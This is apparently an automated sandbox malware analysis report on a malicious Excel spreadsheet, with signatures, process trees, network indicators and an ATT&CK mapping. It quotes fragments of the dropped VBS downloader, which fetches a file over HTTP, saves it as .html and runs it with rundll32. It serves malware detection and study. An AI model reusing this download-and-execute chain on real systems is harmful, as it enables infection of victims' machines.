
Analysis Report notif-5544.xls

Overview

General Information

Sample Name: notif-5544.xls
Analysis ID: 289557
MD5: ae2a14caa5595ef02ec0ac2632940117
SHA1: f80b96e39c2ba53619156e24d1b3bee531869b97
SHA256: 40a49d9211f7ea4b78bbfb8864967fbfa64231af26e0e4d572afa29c3b9fcbd2

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Launcher Generic
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 2492 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 1980 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 3056 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2332 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2704 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2688 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2924 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 3024 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2956 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BF68mQO.vbs | JoeSecurity_VBSLauncherGeneric | Yara detected VBS Launcher Generic | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Office product drops script at suspicious location
    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2032, TargetFilename: C:\Users\user\AppData\Local\Temp\IEODW20q.vbs

    Signature Overview

    Spreading:

    Yara detected VBS Launcher Generic
    Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\BF68mQO.vbs, type: DROPPED

    Software Vulnerabilities:

    Document exploit detected (creates forbidden files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\wclW2.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\BF68mQO.vbs
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe
    Source: global traffic; DNS query: name: beautifulday.site
    Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 172.67.156.10:443

    Networking:

    Potential malicious VBS script found (has network functionality)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: WFXl.Open : WFXl.Type = 1 : WFXl.Write OncPXR.ResponseBody
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: WFXl.SaveToFile "C:\Users\user\AppData\Local\Temp\WF2jvZZl.html",2 : WFXl.Close : Exit For : End If : Next
    Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: unknown; DNS traffic detected: queries for: beautifulday.site
    Source: unknown; Network traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49165

    System Summary:

    Found Excel 4.0 Macro with suspicious formulas
    Source: notif-5544.xls; Initial sample: WORKSPACE
    Microsoft Office drops suspicious files
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\wclW2.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\BF68mQO.vbs
    Potential malicious VBS script found (suspicious strings)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b) : Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: WuFASAt.Document.Application.ShellExecute "rundll32.exe","C:\Users\user\AppData\Local\Temp\WF2jvZZl.html,DllRegisterServer","C:\Windows\System32",Null,0
    Source: notif-5544.xls; OLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Window title found: microsoft excel ok the workbook cannot be opened or repaired by microsoft excel because it is corrupt.
    Source: classification engine; Classification label: mal96.spre.expl.evad.winXLS@16/10@2/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\4ADE0000
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRD104.tmp
    Source: notif-5544.xls; OLE indicator, Workbook stream: true
    Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: unknown; Process created: C:\Windows\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Windows\explorer.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs'
    Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbs
    Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs'
    Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbs
    Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbs
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbs
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs'
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs'
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs'
    Source: C:\Windows\explorer.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Windows\System32\wscript.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exe File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\explorer.exe TID: 2496 Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2496 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2812 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2824 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2824 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2928 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\wscript.exe TID: 3060 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 3008 Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 3008 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 3028 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\wscript.exe TID: 2260 Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\wscript.exe TID: 2260 Thread sleep time: -60000s >= -30000s
    Source: explorer.exe, 00000006.00000003.2228484655.00000000001AA000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

    HIPS / PFW / Operating System Protection Evasion:

    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.156.10 187
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 2492 base: 50000 value: 01
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 2492 base: 50020 value: 9A
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 2492 base: 7FFFFFDF368 value: 00
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 1980 base: 50000 value: 01
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 1980 base: 50020 value: 9A
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 1980 base: 7FFFFFDA368 value: 00
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 3056 base: 50000 value: 01
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 3056 base: 50020 value: 9A
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Memory written: PID: 3056 base: 7FFFFFD9368 value: 00
    Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    (A number in parentheses after a technique is the count of signatures matched for it in this analysis; techniques without a number had no matches.)

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting (321) | Path Interception | Process Injection (21) | Masquerading (1) | OS Credential Dumping | Query Registry (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Exploitation for Client Execution (23) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (2) | LSASS Memory | Security Software Discovery (11) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (21) | Security Account Manager | Virtualization/Sandbox Evasion (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting (321) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (3) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

    Behavior Graph

    (Interactive behavior graph not reproduced.)